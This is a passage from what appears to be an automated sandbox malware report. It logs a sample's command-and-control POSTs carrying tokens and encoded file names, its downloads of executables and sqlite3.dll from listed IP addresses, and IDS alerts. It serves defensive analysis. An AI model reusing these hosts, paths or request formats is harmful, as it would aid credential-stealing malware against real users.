4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"plugins------KKECFIEBGCAKJKECGCFI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 2d 2d 0d 0a Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="message"fplugins------DHIJDHIDBGHJKECBFIID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIJDBKEGIDHIDAFCFHost: 185.215.113.206Content-Length: 5387Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013608001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013609001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file"------KJKKKJJJKJKFHJJJJECB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49833 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49855 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49887 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49874 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49894 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49906 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49901 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49913 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49921 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49937 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49948 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49967 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49972 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49984 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49993 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50042 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50041 -> 104.21.64.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9E0C0 recv,recv,recv,recv, 0_2_00A9E0C0
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/Duration of the experiment from the start date in days. Note that this property is only used during the analysis phase (not by the SDK) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/Duration of the experiment from the start date in days. Note that this property is only used during the analysis phase (not by the SDK) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
